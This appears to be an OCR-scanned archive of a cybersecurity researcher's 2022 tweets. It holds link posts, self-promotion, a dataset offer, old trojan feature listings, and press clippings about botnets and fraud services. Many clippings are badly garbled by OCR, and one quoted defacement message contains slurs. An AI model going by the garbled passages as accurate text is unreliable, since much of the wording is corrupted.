https://t.co/OwgdVfLOnn 
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Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 
https://t.co/OhsvxTNolk 
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04:57 
Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 
https://t.co/50AkncWz47 


04:58 
Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 
https://t.co/uWuq1t9DYZ 


04:58 


Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 
https://t.co/M2HInOOCZT 


04:58 


Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 
https://t.co/PRHB5HDd7n 


7 - Saturday 
02:51 
My Dark Web Onion - https://t.co/cQq40tVcwD https://t.co/KBQqcGNdpk 
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Visitors Visits 


Today: 1 27 
Yesterday: 1 5,262 
Last 7 Days (Week) 8 38,656 
Last 30 Days (Month) 31 142,408 
Last 365 Days (Year): 319 330,408 
Total: 319 §69330,408 


07:30 


https://t.co/qLxz4GuRip #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberwar #CyberSec #CyberHunter #threathunting 
#Threatintelligence #threatintel https://t.co/nNQtqtTNkZ 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


18:55 


https://t.co/H7zZRZUNCZq #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberattacks #CybersecurityNews #threathunting 
#Threatintelligence #threatintel 


19:18 


https://t.co/gej8f4CWpN #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberattacks #CybersecurityNews #threathunting 
#Threatintelligence #threatintel 
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8 - Sunday 


05:45 


https://t.co/AGB]d8eCtX #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cybersecuritytips #CyberSec #cyberattacks #ThreatIntelligence 
#threathunting #threatintel https://t.co/LRTy5XEG3g 


Portis? 
Wor: E-MAR PROPAGATION 
WoRM™: IRC PROPAGATION 
KEYSTROKE LOGGER 
FTP SERVER 
PASSWORD GRABBER 
DESTRUCTIVE 
TARGETS SPECIFIC PROGRAMS 
ck Orifice 0.6.3136 alpha STARTS EVERYTIME WINDOWS STARTS 


DeepThroat 1.0 
0 
[HKEY_LOCAL_MA 


ender 1.03 
ender 1.04 
ender 1.06 
ender 1.07 


The functions of this trojan are 


Cp port 


ng for connections 


GulFrend 1 
GulFrend 1.35 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty.Ltd. - information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


16 - Monday 


10:17 


This just in. Shipping them in batches. Since the early days of humankind. | just gota 
FortiMail and quite impressive a FortiSandbox appliance where | wanted to thank my 
current employer @whoisxmlapi for making the infrastructure investment. Stay 
tuned! https://t.co/uflP2wCxli 
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20 - Friday 
04:57 
This is me and @whoisxmlapi rocking the boat! - https://t.co/VUSMB6njx5 


*1 


21 - Saturday 


01:54 


https://t.co/VuUSMB6njx5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #cybersecuritytips #cybercriminals #ThreatIntelligence 
#threatreport https://t.co/pn9Otfsx1Z 
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= @)) WhoisXMLAPI Login Sign Up 


@) Law Enforcement Nautilus Feed Related links + 


Apply for Access to the Law 
Enforcement Nautilus Feed 


The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (IOCs) and Articles of Interest (AOls) linked to major malicious 
campaigns and APT groups. 


The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 


process by applying for access. 


24 - Tuesday 


10:15 


https://t.co/JTcqOaYgET | https://t.co/OmUajr8DT8 | https://t.co/sMWCGUWRé6g | 
https://t.co/ZOwW9r2oiV | https://t.co/eufoOwGUnb | https://t.co/nNsXMPrGi0 | 
https://t.co/7GM10oNelFK | https://t.co/uvAt5gK9BA | https://t.co/UZ6qVAhXVF 
https://t.co/cxwtzGpImF 


10:22 


RT @whoisxmlapi: For law enforcement, intel from WXA can provide critical clues 
about threat actors or even prevent cybercrime. Discover ho... 


10:38 
https://t.co/JTcqOaYOur https://t.co/IwBxUr2gY] 
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10:38 


https://t.co/JTcqOaYgET https://t.co/IIH9yXm3vV 


10:39 


https://t.co/JTcqOaYgET https://t.co/7hHUB300gFk 
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10:39 


https://t.co/JTcqOaYgET https://t.co/4hFiOETMO5 
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10:40 


https://t.co/JTcqOaYgET https://t.co/Oo4EZyb7eO 
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https://t.co/JTcqOaYOur https://t.co/ZceCrdPiTi 
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10:48 


https://t.co/JIcqOaYgET https://t.co/uSjeb23ngD 
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10:48 


https://t.co/JTcqOaYgET https://t.co/3ixzp4s4dB 
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10:49 


https://t.co/JTcqOaYgET https://t.co/g4fiCptF2u 
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10:49 


https://t.co/JTcqOaYgET https://t.co/OGE40Xpyx0 
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https://t.co/JTcqOaYgET https://t.co/W3BuAF4nYq 
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10:50 


https://t.co/JTcqOaYgET https://t.co/eRYkb14kEl 
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https://t.co/JTcqOaYOur https://t.co/iT7cjXgQU9 
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https://t.co/JTcqOaYgET https://t.co/3VTATBJOA5 


699 
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https://t.co/JTcqOaYgET https://t.co/uks2SNzq5v 
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https://t.co/JTcqOaYgET https://t.co/CO5Cd1TDLH 
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10:52 


https://t.co/JIcqOaYgET https://t.co/m7reNNjhop 
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10:52 


https://t.co/JTcqOaYgET https://t.co/Ubiu5iCmhp 


10:53 


https://t.co/JTcqOaYgET https://t.co/BfLCyqy7Jz 
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https://t.co/JTcqOaYgET https://t.co/orA96vou76 
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https://t.co/JTcqOaYgET https://t.co/qxjSX35KoS 
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https://t.co/JTcqOaYgET https://t.co/g47D28qkEP 
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https://t.co/JTcqOaYgET https://t.co/EzPI3IsvpA 
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https://t.co/JTcqOaYgET https://t.co/AYewqPzqbG 


10:55 


https://t.co/JTcqOaYgET https://t.co/rzMd3GVUXn 
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26 - Thursday 


09:36 


When we used to rock the boat! - https://t.co/eVsxfo6tWx Cheers! Dancho CC: 
@Webroot https://t.co/gUuLsClkKu 
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09:37 


When we used to rock the boat! - Part Two - https://t.co/eVsxfo6tWx Cheers! Dancho 
CC: @Webroot https://t.co/XurF79jgNw 


713 


09:38 
https://t.co/JTcqOaYgET https://t.co/y8ThCY40BQ 
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https://t.co/JTcqOaYgET https://t.co/nck7gyqPI3 
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Team, Security, Aref, GH... (6) Kazi_root, Original-Hack... (6) Hacker, M4st3r_4w4r3, ... (5) 


Mr.Bami, Rootqurd, Tink... (5) BOY, ErRor, H3LL, MoHa... (5) Amob07, Number 14, PU... (5) 


Team, Security, xXx, AR3...(2) ) (Team, Security, xX, AR3... (2) 
yw 
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https://t.co/JTcqOaYgET https://t.co/sa5OQpE2DY 
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Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
Views 
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100K 
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Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


09:50 
https://t.co/JTIcqOaYgET https://t.co/5vCgjnDOHW 


731 


09:50 


https://t.co/JTcqOaYgET https://t.co/bxoRCvhhij 


732 


09:51 


https://t.co/JIcqOaYgET https://t.co/hjUOlsOeEB 


EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV 
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Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality fake scans that can be used in fraud attacks to impersonate 
victims, Group-IB researchers said 


eo@0C00000 


By Lucian Constantin 
Romar Correspondent, CGO 


Anew Web-based service for cybercriminals automates the creation of fake 
scanned documents that can help fraudsters bypass the kiendty verification 
processes used by some banks, e-commerce businesses ard other online 
services providers, according to researchers from Russian cybercrime 
investigations firm Group-IB. 


The service can generate scanned copies of passports, ID cards and driver's 
bcenses from ditierent countries for Kientibes supped by the service users, fake 
scanned utility bills from various companies, as well as take scanned copies of 
banking stalements and credit cards issued by a large number of banks, said 
Andrey Kornarov, head of intemational projects at Group-IB, via emai. 


Itis common practice for banks, payment and money transter providers, onine 
gambling sites and other types of businesses thal engage in money transactions 
via the Intemet to ask their customers for scanned copies of documents in order 
to peove their identities or verify their physical addresses, especially when their 
anti-fraud departments detect suspicious accourn activity 


[ Retated: 4 places to find cybersecurity talent in your own organization J 
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SC Macks US » Nirwt > Mak website hacking tool salertt to dangers of Google dorks 


by Actam Greenberg. Senior Reporter 
| 9 Fcton terargscon | 


November 05, 2013 


Mass website hacking tool alerts to dangers of Google 
dorks 


0000000 


Google deeks are nat peeks who love the ivtemet- related services and products provider. Google dorks are akin to 
super-specific searches, which attackers have been known to take advantage of in attempts to expose vulnerable 
websites. 


Cyber crime researcher Dancho Danchev recently blogged about 2 mass, do-R-yourself (DIY) website tacking tool 
making the rounds that takes advantage of those Google dorks. 


“The proxy supporting tool has been purposely designed to allow automatic mass websites reconnaissance for the 
purpose of launching SQL infection attacks against those websites that are vulnerable” Danchev wrote. 


SQL stands for structured query language and ik programening terminalogy designed for managing data, SQL 
infection typkally involves an attacker inputting SQL statements into an entry held that will force the system to 
exccule potentially malicious commands, 


“Once a compromise takes ploce, the attacker is in a perfect position to inject malicious scripts on the affected 
sites, potervtially exposing their users to malicious client-side exploits serving attacks.” according to Danchev. 


Danchey wrote that an escalating number of DIY tools circulating the internet may apen the door for nove 
Mtachers, but Banry Stielman, director of security strategy with Imperva, told SOMagazine.com on Tuesday that i is 
the Google dorks that should be raising alarms. 
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Fake CNN Alert Still Spreading Malware 
@oeeago09o 


By Gregg Kore 


The massive attack that has tected PCs by tncking users nto choking Inks 
in take messages from CNN com shows ithe sgn of ending soon. secunty 
researchers tay 


wont Unt es 


Fate Neren Dern lorem Urwwe 


According to WX Logic Ine. , span posing as CNN.com Top 10 lets peaked at taperemessagpeneme 


ote to 11 milion messages per hour early Thursday, but remained at high 18-Ouich Meee fer the Worst Securty 
volumes Proughout the day Friday The Colorado security vendor sad ¢ had Npenwes 
been tacting an average of 8 millon messages per hour tence Mrucraght wees 

Wry You Low Ynw Mrdoan ? 
MX Loge’s vce presdert of information tecurty, a> Vote > , called Re Proal tary 
tend “a very slow, tut steady decline” bom the 11 am. Mountain Time peak 
the day betore 


| Furner cpading bine he ree me ef antvinn summery wl grote your PC | 


Masel also sad Pat he spam has changed since attacks were frst 
launched on Tuesday “We've also seen several monpins of Ps spam over the 
past couple of days,” he sad in an entry posted on He UK Loge biog Fretey 
Where the messages once tunpeted © Ch) com Dally Top 10° n he 
Opt Meaing and irked 0 a wegie Meerarme on makeare hostirg Stet row 
the spam sports a sudyect reading “CNN Alerts: My Custom Alert” and uses a 
vanety of Meramnes in he maloous URL 


“Thee is lkoly in response to af of The mecha aflerien and awareness Pat has 
been brought up over Ihe past coupe of Gays.” Maelo speculated 


Also on Friday, Websense inc reported that ¢s researchers had seen the 
attack eutating. with the span subyect heading net only touting “CNN Alerts 
My Custom Alec“ tut also using legitimate news stones culled trom CNN to 
make the messages more comvmcng 

Users who cliched on the "FULL STORY” irk in the message mere redirected 
to a take CNN ete. where fey were told they needed to download an update 
to Flash Player, Acobe System ine 'S popadar Internet mecha player. to view a 
video clip from CNN. 


Wetserse also sad 4 had spetied traces of The carpag in biog span 


fpmremrearoet 
2 Wary rere tos Canad ad Conve Mec racine, 
3 Frm tee 9 tg Gain ca Were wer knteny beeen wat 
Neraree's bata tne CAs tasnery MOEA Ae why 


tt upees agreed to download the bogus Flash update. they were rapped in an 
endiess loop, where clicking “Cancer” in the intial dialog produced a second 
popup. Clicking “Cancer” there eeturned the user to the fest pop-ep. The only 
options af thal port weee for users to thet Gown the Browser of gwe mn and 
instal De malware 


MX Loge added that ¢ had seen he URIs in he spam lead to legtrnate 
Gomanns that had probably been compromsed. and named a UK based 
rooting company at an example 


Earter thea weet. Butoanan securty sesearcher Dacha Danchey had found 
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Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality take scans that can be used in fraud atiacks to impersonate 
victims, Group-IB researchers said 


0@0000090 


Oy Lucien Constenen 


Anew Web based service for cybercrminats atomates the creation of tame 
scanned documents tut can help taudters bypass the centty verification 
PrOC#eREOS Uned by tome barks, @-commerce bummesses and other onine 
Lernces prowdert according 1 revearchers tom Rutan cybercrene 


nvevigatons frm Grape B 


The sernce Can generate scanned copes of passports, ID cards and drivers 
hoenses from Giterent countnes toy entites suppied by Phe service users. take 
SLanned Allty bibs form various COmpurmes at wel as take scanned copes of 
barking Stterents and credit Cards issued by a lange number of barks sand 


Andrey Kornaroy. head of rtematonal progects at Group 1. va enad 


Ria common practce tor barks, payment and money taraler providers, oriie 


garibiing ates and other types of busmesses Tl engage n money farsactora 
Wa the Internet to ach ther customers for scanned copes of docurnents in order 
to prove thew certies or verty ther piiyucal addresses, eupecaily mhen ther 


an® hand Gopartnents Getect sumpicious account actly 


[atated: 4 places 0 find cybersecunty talent in your own organization} 


Ung erage manpuiate Pere MOS CCN Cretan 


soMaare \ Change te photo 


on a scanned ID 6 otwouny net a new practce Dut services lke the one 


erties by Group IB Put atomate he whole process and produce Ng quality 


resuits are new on the cybercrrmnal market, Komarew sad 


According to Group &. the service c proweied Prough a mebete hosted on a 


server m Germany The domun nuene mars regaitered in May, buf the service 


wat leurched i md Aust, Komarow stud 


Inceperctent cyDercmme sesearcher Dancho Oanchev Gescrbed a very sentar 
Bervice in a July biog post: howewer, Komarov coukd not confiern whether @ is the 
paene one because there mas no reference to the service's domain mame in 


Danchev's report 


The sence found by Group IG has tewnpiates tor passports. ( carts and 
@iver's loences fer De U.S Canada, Russia, He UK. Germany, De 
Netrertands and offer Evropean Urvon countnes & also Mas ternptates tor bark 


pernerts. credit cards — thor’ and Back are) utility bls torn Banks and utity 


COMpENEL CpETIEN) 1 Pote counties 


The ternpiates are for docurnents and cards Dut show ages of use and are 
scanned at diferert anges and dferert posters on the canvas Ths makes 


the resin rrage appear more authentic 


fewree! 
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Web Gang Operating in the Open 


Twe men beteved to be reaponatie for treading a notorious computer 
(BOF On F acebOOn and offer socks hetworks — and pocketing several 
(raion Glass Dom Crtine Léreomes — are hudirg m pinn Lape wy SE 
Peoternturg Mussa according to inventigators at Facebook and several 
independent Computer Securty retemenert 


The men bee comtortabie Ives in St Petersiueg — and have botched on 
hamury wacalors in paaces lke Monte Carte. Gal and, carter Drs mort. 
Tintay SCOnSing 10 PRR AEMS Potted On LOCA Fete Stes — even 
hough thew erttes have been inown tor years to facebook computer 
area ak koto a nteey 


Orne mortar of the gqoup afech is popularly known as fhe Moctface gang 
Nas repsary broadcast he coordinates of Ms offices by Checking Non 
FORUM, 2 CABO COLES LOCI METRO and POEtNY Te hows % 
Twitier Photographs on Fouruquare aise thow other suipected members 
Of he Group working on Macs in a ioftine room Thal looks the oMces weed 
Dy OCP FLA UE OOS arcurNS em word 


Bargererny 9) day 2008 the Kecttace gang aed al WHO Uters en 
imetanons to match a tny oF tery video Those aries enough to click 
the Ira got a message to update Tew computer's Mash soMeare. whch 
beprn he doericntd of Ihe Hontt ce mukeare Viele complet ae 
(Wates inte a Wotret.” of network of Whected PCs and are sent offical 
lootung advertsemerts of take arOvirus software and Per Wed teaches 
are a0 Nyached and Pe Cichs Oetvered to uracrugsions marketers The 
AD Made moray YOM pecgie aD boat De DORA Liens and Porm 
mneuepecting advertsers. 


The Lecurty Lomare ton FaLperthy Labs Mas OtSmates Ire hetero 
(chudet 400 000 to B00 000 PCs workiwade af 3 heh mn 2010 Wetens 
are cen unaware Dee machines have been compromses. 


ee The New York Times | = 
Bove the haope Comtigtasta: mpvacteytes OU | Count Coton teceamene ws Ler 
erry 4 Pers bal 


0000 - 


. ctsmanwemamen manners [=e ] 


The Rocttace garg § Peedom underscores how Rand @ 6 to apprenend 
(ternational computer crrmnals. even ehen erties are known These 
NOS Ferd 80 Operate in Courtras ohare Daey Can ert rmetesied by Pe 
local RENOMEES and where COnperanOn ah Untied States and Europea 
laa ertorcerrert ageroes a poor Usarwhie Wettern ine entorcenert a 
@ensh in Computer crime ard lacks the setources aru) skied manpower to 
ACR f OMECDV Ely CLDRCUMy When EveKe fSINg Mua tigers on 
deyboards must be collected atrcad 


On Tussday, Facetook gtans to ance Tut # at begin paring 
irtormation about he group and how to fight then with securty researchers 
APS Cine Digrrel Compares Tl Lenten pte, Camere Can mame t harder 
for tcl Groups to Operate and send a mestage to the comma! 
underypound 


None Of Te men awe BOON CRANROD WE a CHIME and MG law entorcerrert 
agences hawe confirmed Dey are under investigation 


The (he ewvestepatons Nave Ktenttund Mas adopted Te tongue «Peek 
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Bupmyaano npocmpancmBo 


KABEPTEPOPUSMbI 
T\OKOAKO PEAAEH E MPOBAEMbT? 


UHQOPMAUMOHHATA VKOHOMUKA, 8 koamo 
cBemom HaBaeze npe3s nocaeguume 20 2oguxu, 
GaazonpuamcmBa pasBumuemo Ha mOogepHUMe 
cpegcomBa 3a komyHukauur, pas6uBadku mexkgykou- 
muveHmMaaKUMe U emHUYeCKU 2paHuUU, NpUgaBad- 
ku HOBu U3MepeHUA Ha NOKAMUEMO UHdOPMaUU- 
OHHO O6uwecmBo, a Moke 6u MoUKOMO NOHAMUe 
@ UHPOpMaUUOHHO-aBucuMO ObwecmBo! 

Ta3u cmamua ce cmpemu ga pa3zaega npobvema 
3a uxdopmauuOHHama Bodxa u kubepmepopusma, 
koGmo Heu3MeHHO A ConeomcmBa, om pasauUHU 
e2aeguu mouku. Ta we om2oBopu Ha caegHume 
Benpocu - kakBo e kubepmepopu3»m u kakBa 
e@ pazsukama mexkgy Hez2O U UNPOpMauUOHHaMa 
BoGHa? Mozam au gedcmBuama wa uNdopmauu 
OvHama BoGHa u e kubepmepopusem ga npegus- 
Bukam uoBewku »*xepmBu usu ukoHOMUYeCKU xaoc 
u kakBu ca Be3moxkHUMe CUueHapUuU? 
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ee ee) 
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Parra omGapsnemo na 


Gepnauus lamo US u foges: gakmap 


Gpewemo wa Cmygenama Goons LPY o 
KIS ca papermaw ocmpGmo xs HUMINT 
(woBewko pagyzsafane), umpopsauu- 
ommama peodbuus u soGaupeuus 
gonputece 32 gomwurumeaHome pay 
Gemnue na SIGING (camaro papyna 
Gane} ELINT (pap pu) u gope 
CYBERINT (hasGeppayygnstione). Becke 
om ufipoenume munofe @ noxfiae ya 
opanzules, & 32 jausemes wrus. 

1B Hetudgany go npegu 2 efey 
Maknocms ja Co Gera ne © aman ppane 
ma pajyyubameas unfopemms « 
Gegene na Goemwe grécméus, Mup- 
Gam auepelandu payyyabameren 
camexem - CORONA, uznpauas 
evipanume camewmes crouke = 
CvGemchus cvlog wpe3 kancywa, koumo 
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cOmanina Presents 


I'm back niggaz better than ever t0 Own j00 


More Hackz Of Troyan Pages Coming These Days Because The Passwords Are Let's Say:hacker,troyan,Enkin etc. etc. 


I'm Fucking With These Pages Only Because Of Nark@manina’s Wish And As I Said Because Of The Weak Passwords. 


10:00 
https://t.co/JTcqOaYgET https://t.co/o88gvuVW9IL 
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10:00 
https://t.co/JTcqOaYgET https://t.co/tt9pYtMCZt 


10:00 
https://t.co/JTcqOaYgET https://t.co/Jt8ELjW8vv 
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10:00 
https://t.co/JTIcqOaYgET https://t.co/aolxjvmLjO 


It's All a Matter of Perspective 


Somewhere in Eastern Europe In a “hacker recruitment" basement 


What?! 
Can you believe Someone's 
this Yuri? disrespecting 
$450,000 per Lenin's idea for 
year and nota equal distribution 
single donation in of income? 


John Doe's entire |) "proceed" with his 


Outrageous, but 
knowing it’s teens 
without girlfriends 

behind this, | know my 
money are safe 


If only he It has come to our 
knew that attention that you're 

half the Quite talanted for a 
world's intel cybercriminal Andrei. 
agencies Congrats, as of today 
outsource to || you serve “the family" 
and will code malware 


ifactad 
over 10,000 
sitas in Italy, 
Yes honey, our, cease 


lifetime? bank accounts aaa, your 


Faye a to stay alive. 
money are safe. 


Yes, my 
Master! 


10:01 
https://t.co/JTcqOaYgET https://t.co/y8S2ePDYGm 


www stripgenerator.com 
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2010/07/22 12:50 


10:01 
https://t.co/JTcqOaYgET https://t.co/ghRSiqHGe4 
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EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV 


10:01 


https://t.co/JTcqOaYgET https://t.co/QVsnQclInl6 
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100 AYYWAX PASBOAHBIX MYJIOB . 
B USA VK UK EX EMECHYHO 


10:01 
https://t.co/JTcqOaYgET https://t.co/1JOMOFted2 
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10:02 


GEE Once 


vy f Yo 
www.cubercamp.es 


=) 
ae 


https://t.co/JTcqOaYgET https://t.co/nQrmYPkveU 
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PRIMARY CHARACTERISTICS 


SIZE: 124928 

kK FTP J REMOTE ACCESS TROJAN 

tifice 1.20 Wor: E-MAIL PROPAGATION 

Wor: IRC PROPAGATION 
KEYSTROKE LOGGER 
FTP SERVER 
PASSWORD GRABBER 
DESTRUCTIVE 
TARGETS SPECIFIC PROGRAMS 
STARTS EVERYTIME WINDOWS STARTS 


Rect RY AND ras ACTIVI ’ 
[HKEY_LOCAL_MACHINE\SOFTWARE “\Microse indows\Current¥ersic 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. - information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


10:02 
https://t.co/JTcqOaYgET https://t.co/5B9dh4pBiv 


10:02 


https://t.co/JTcqOaYgET https://t.co/gfMAWkliaY 
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10:02 


https://t.co/JIcqOaYgET https://t.co/oGxsCuiM3i 


10:11 


https://t.co/JTcqOaYgET https://t.co/mZbvWXvOFx 
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10:11 


https://t.co/JTIcqOaYgET https://t.co/XSSUVO10QA 


10:12 


https://t.co/JTcqOaYgET https://t.co/CYYLjjVNM4 


Astalavista Security Group — 
Astalavista 2.0 — Investment Proposal 


By Dancho Danchev — 


oe 


dancho.danchev@hush.co 


10:12 
https://t.co/JTcqOaYgET https://t.co/nVW61nkXHf 
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What is Astalavista Security 


100.00% Organic 


10:13 


~~) UCVI , 


fe) 


ra 
7 


and delivered to thousands of h 


* Aubiquitous and a diverse set of premium fes 
leading to the World's largest and most vibre 
Hacking and Cyber Security Grid Network 
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10:13 


10:13 


https://t.co/JTcqOaYgET https://t.co/yljkirFPRA 


Who's behind it? 


https://t.co/JTcqOaYgET https://t.co/rh9wovYNX2 


Who's behind it? 


ConSpiracy 
Who Owns 


Astalavista Secunty 2.0 - A Hacker i Every Home 
The WOrke'S Largest and Most Vitrant Securty and Hacking Communty 
ers Your Momet Stay Sunect 


10:13 


Contributor to Black Sun Research Fé 
(BSRF) 


Trojan Defense 


Contributor to LockDownCorp 


10:13 
https://t.co/JTcqOaYgET https://t.co/ztEsxLkQyA 
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Related Product and Service 
Images and Screenshots 


10:13 
https://t.co/JTcqOaYgET https://t.co/xgCkCxx7OL 


Related Product and Service 
Images and Screenshots 


Astalavista Security Group Security Training - 
Basics of OPSEC 
Exptore the Basics of OPSEC 


— 


10:15 


https://t.co/JTcqOaYgET https://t.co/Nwp4jPHeWE 


10:16 


It's called 
with DoO's cyber assets is ' from the Russian || | “segmenting 
unacceptable. Initiate an to faciliate OSINT A the attack 
immediate traceback! through botnets. population" 

"Ensure your Yuri. 
transmit back the || victory before ; : Perhaps we 
data obtained | | starting a battle’, should print 
from the infected , out new 
brochures. . 


www. stripgenerotor.com 
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30 - Monday 


09:19 


RT @whoisxmlapi: WhoisXML API tracks prominent cybercriminal groups. To help 
#cybersecurity industry we have now uncovered a list of active... 


June 


3 - Friday 
06:29 
@Jeff__yates Jeff. Got it. I'll drop you a line shortly. Regards. Dancho 


*2 
07:10 


@Jeff__yates Just replied. 


*1 


4 - Saturday 


08:29 
RT @whoisxmlapi: Who’s going to RSAC 2022 next week? 
WhoisXML API team is going to be present at RSAC 2022 and we are looking forward 


to... 
6 - Monday 
00:41 
https://t.co/cfoHy1tkeG 
00:41 


https://t.co/2fnuOEmM1hT 


8 - Wednesday 


01:40 


I’m back full time! Check this out - https://t.co/WIBGTU5ryT RSS - 
https://t.co/2VRBr24Ya9 and show your support! Regards. Dancho #CyberSecurity 
#cyberattacks #cybercrime #cybersecuritytips #CyberSec #CybersecurityAdvisory 
#security #Threatintelligence https://t.co/qGPgqaPKq4 
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Offensive Warfare 2.0 - The Web's Primary 
Cybercrime Research OSINT And Threat 
Intelligence Central Clearing House 
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Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 
Portfolio of Rogue and Fake News =s Infrastructure of the Infamous I'm not a robot 
‘ ‘¥ “Innovative Marketing” Rogue Scareware 
Provider - An OSINT Analysis 


Domains 


06:35 
https://t.co/I8IN78UTpe https://t.co/js5ES7OEkKVd 
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Offensive Warfare 2.0 - The Web's Primary 
Cybercrime Research OSINT And Threat 
Intelligence Central Clearing House 


Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 
P= | Portfolio of Rogue and Fake News 3 
“—_ uty 


Infrastructure of the Infamous 
— Domains 


ms 


fim not a robot 
“Innovative Marketing” Rogue Scareware 


Provider - An OSINT Analysis 


SS es 


06:35 
https://t.co/eA8DCIZgNQ https://t.co/f4cOTmuvCd 
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Offensive Warfare 2.0 - The Web's I 
Cybercrime Research OSINT And Th 
Intelligence Central Clearing House 


Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 
P= | Portfolbo of Rogue and Fake News Zz Infrastructure of the Infamous im not a robot 
7% P . 


-- Domains “Innovative Marketing” R 


ae Provider ~ An OSINT Analysis 


| Lorin Ih ain now | 


06:36 
https://t.co/tfoGvc4oyK https://t.co/H42kdZFOKg 
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Offensive Warfare 2.0 - The Web's Primary 
Cybercrime Research OSINT And Threat 
Intelligence Central Clearing House 


Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 
P= | Portfolio of Rogue and Fake News 3 
“—_ uty 


Infrastructure of the Infamous 
— Domains 


ms 


fim not a robot 
“Innovative Marketing” Rogue Scareware 


Provider - An OSINT Analysis 


SS es 


06:36 
https://t.co/Q7QgXQ3xn7 https://t.co/7_LtFGARNYp 
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Offensive Warfare 2.0 - The Web's I 
Cybercrime Research OSINT And Th 
Intelligence Central Clearing House 


Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 
P= | Portfolbo of Rogue and Fake News Zz Infrastructure of the Infamous im not a robot 
7% P . 


-- Domains “Innovative Marketing” R 


ae Provider ~ An OSINT Analysis 


| Lorin Ih ain now | 


06:36 
https://t.co/YAvxahXPUO https://t.co/ompO08vKyQK 
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Offensive Warfare 2.0 - The Web's Primary 
Cybercrime Research OSINT And Threat 
Intelligence Central Clearing House 


Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 
P= | Portfolio of Rogue and Fake News 3 
“—_ uty 


Infrastructure of the Infamous 
— Domains 


ms 


fim not a robot 
“Innovative Marketing” Rogue Scareware 


Provider - An OSINT Analysis 


SS es 


06:36 
https://t.co/qhX7shFRLQ https://t.co/jX4TgPgpgd 
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Offensive Warfare 2.0 - The Web's Primary 
Cybercrime Research OSINT And Threat 
Intelligence Central Clearing House 


Recent Posts 


Profiling a Currently Active Domain Exposing the Internet-Connected 

Portfolio of Rogue and Fake News Infrastructure of the Infamous 

Domains “Innovative Marketing” Rogue Scareware 
Provider ~ An OSINT Analysis 


mis 


06:36 
https://t.co/NfcNpDvRq7 


06:36 
https://t.co/yUfNCGB4VA 


06:36 
https://t.co/wdt5sD4Rxv 


06:36 
https://t.co/iPcYVtW5Wk 


06:53 
@paulfroberts @ReversingLabs Paul. Check this out - https://t.co/EfZynMvQAy this is 
770 


me and my information using OSINT on SolarWinds. Cheers to everyone at #RSAC22 
#RSAC who knows me and remembers my research. CC: @netresec 


06:57 


@ImposeCost Is this for real? | thought that #RSAC22 #RSAC is a mainstream type of 
event rather than a COMSEC event to bring in the OPSEC crowd which would be 
surreal. My point - I’d never bring in my "personal details" in the form of anything but 
a just bought hotel PC. 


07:00 


Who’s attending #RSAC22 #RSAC and remembers my research (2008-2013)? - 
https://t.co/UZ6qVANxVF Mad props although | don’t truly understanding the meaning 
of this greeting to everyone who knows me. "Congratulate a friend and say hi to 
Dancho". #KeepTheSpirit 


07:14 
https://t.co/xLNts45F1t 
07:14 
https://t.co/HAL7R6UIixX 
07:14 
https://t.co/t~XAnNWpPoF 
07:14 
https://t.co/DXbq6EZNwC 
07:14 
https://t.co/oO0VsryUYm 
07:14 
https://t.co/RPO1fPkqZT 
07:14 
https://t.co/Fx27SUPRmu 
07:14 
https://t.co/ZbwyG56DI) 
07:14 
https://t.co/N1JTGA973i 
07:15 
https://t.co/dKDjAueVOm 
07:15 


https://t.co/7 Fyh5EJnhx 
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07:15 
https://t.co/LRFHMOPkhk 


07:15 
https://t.co/KDq44uboM8 

07:15 
https://t.co/5EgOZytl1t 

07:15 
https://t.co/bOjUV4sNjp 

10:43 

Dear @Cryptome_org - | just send you an email. Regards. Dancho 
10:44 


Dear @Cryptome_org - second tweet in a row. I’m trying to figure out whether | could 
